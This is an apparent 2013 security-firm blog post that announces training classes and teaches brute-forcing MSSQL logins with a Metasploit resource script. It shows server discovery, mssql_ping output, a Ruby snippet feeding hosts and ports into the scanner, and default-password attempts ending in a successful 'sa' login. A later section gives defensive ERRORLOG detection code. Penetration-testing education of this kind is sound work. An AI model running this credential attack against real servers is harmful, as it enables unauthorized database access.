Thursday, January 3, 2013

Training Opportunities

We are hosting two trainings at the Attack Research Headquarters over the next few months. The first is our Operational Post Exploitation class, which will run January 29th-January 30th.

We have also added an Offensive Techniques class in February, which will run February 26th-February 28th. More details can be found at our training website.

We are also looking at doing a round of training in the London area in May of this year. Right now we are trying to gauge the interest in this location. If you are interested in taking either Offensive Techniques or Rapid Reverse Engineering in this area, please email training@attackresearch.com so that we can gauge interest.

Happy New Year

MSSQL Brute forcing with Resource Scripts

Problem:
How can we brute force MSSQL servers that listen on several different ports without having to manually change the RPORT?

*MSF Pro/Express handle this for you using the database.

Possible Solution:

Use a resource script to populate the values for us.

This will work, but first we have to get the host and port data into the database.

1. Set up the database for metasploit

2. Get a list of servers

OSQL -L

Servers: 
    SEVERNAME1\SQL2000
    SEVERNAME2\SQL2005


OSQL gives you a list of hostnames; we need to turn these hostnames into IP addresses/ranges for mssql_ping.

You can use post/windows/recon/resolve_hostname to resolve a list of hostnames into IP addresses.


msf  post(resolve_hostname) > run

[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed


With a list of IP addresses, run mssql_ping:


msf  auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+]    InstanceName    = MSSQLSERVER
[+]    IsClustered     = No
[+]    tcp             = 1433
[+]    np              = \\servername1\pipe\sql\query
[+]    Version         = 8.00.194
[+]    ServerName      = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+]    InstanceName    = INSTANCE1
[+]    IsClustered     = Yes
[+]    tcp             = 2261
[+]    np              = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+]    Version         = 10.50.1600.1
[+]    ServerName      = SEVERNAME2


Now we can pull the TCP ports out of the database with a query and have the resource script set RHOSTS and RPORT for each entry. weeeeeee

The query:

<ruby>
hosts = []
framework.db.services.each do |service|
  # keep only open TCP services the database tagged as MSSQL (from mssql_ping)
  if (service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
    hosts << {'ip' => service.host.address, 'port' => service.port}
  end
end
</ruby>

The resource script then walks that list and sets RHOSTS and RPORT on the fly for each entry.

Example output:


[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'

RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed

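Because the instances found here listen on whatever port the SQL Browser service advertises (1433 on one host, 2261 on the other), watching TCP/1433 alone misses the second one, while the server's own ERRORLOG records every failed login regardless of port. The following is an added example, not code from the original post or the linked resource script: it parses constructed ERRORLOG-style lines for the 18456 "Login failed" entries and flags a client that fails repeatedly against the same login inside a short window, the pattern the scanner output above leaves behind.

```ruby
require 'time'

# Captures timestamp, login name and client IP from an ERRORLOG "Logon" line.
FAILED_LOGIN = /\A(\S+ \S+)\s+Logon\s+Login failed for user '([^']+)'.*\[CLIENT: ([\d.]+)\]/

def parse_failed_logins(lines)
  lines.each_with_object([]) do |line, out|
    next unless (m = FAILED_LOGIN.match(line))
    out << { time: Time.parse(m[1]), user: m[2], client: m[3] }
  end
end

# Returns one {client:, user:, count:} hit per (client, login) pair that failed
# at least +threshold+ times inside any +window_s+-second window.
def detect_bruteforce(events, threshold: 5, window_s: 60)
  hits = []
  events.group_by { |e| [e[:client], e[:user]] }.each do |(client, user), evs|
    times = evs.map { |e| e[:time] }.sort
    # sliding window: compare each failure with the (threshold-1)th one after it
    burst = (0..times.length - threshold).any? { |i| times[i + threshold - 1] - times[i] <= window_s }
    hits << { client: client, user: user, count: times.length } if burst
  end
  hits
end

# Constructed ERRORLOG excerpt: six rapid 'sa' failures from one client (the
# pattern the scanner run above produces) plus unrelated lines.
FAIL = "Login failed for user '%s'. Reason: Password did not match that for the login provided. [CLIENT: %s]"
SAMPLE_LOG = [
  "2013-01-03 10:15:00.01 Server      SQL Server is now ready for client connections.",
  "2013-01-03 10:15:01.10 Logon       Error: 18456, Severity: 14, State: 8.",
  "2013-01-03 10:15:01.10 Logon       #{FAIL % ['sa', '192.168.237.5']}",
  "2013-01-03 10:15:01.55 Logon       #{FAIL % ['sa', '192.168.237.5']}",
  "2013-01-03 10:15:02.03 Logon       #{FAIL % ['sa', '192.168.237.5']}",
  "2013-01-03 10:15:02.48 Logon       #{FAIL % ['sa', '192.168.237.5']}",
  "2013-01-03 10:15:02.91 Logon       #{FAIL % ['sa', '192.168.237.5']}",
  "2013-01-03 10:15:03.40 Logon       #{FAIL % ['sa', '192.168.237.5']}",
  "2013-01-03 10:16:10.00 Logon       #{FAIL % ['appuser', '10.0.0.12']}",
]

if __FILE__ == $0
  detect_bruteforce(parse_failed_logins(SAMPLE_LOG)).each do |h|
    puts "#{h[:client]} -> #{h[:count]} failed logins as '#{h[:user]}'"
  end
end
```

The single 'appuser' failure stays below the threshold and is not reported; only the burst against 'sa' from 192.168.237.5 is.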

The code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb

Lots of other resource scripts live in the scripts/resource directory of your msf install:
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource


UPDATE 4 Jan 2013:
Merged into Metasploit trunk:
https://github.com/rapid7/metasploit-framework/pull/1234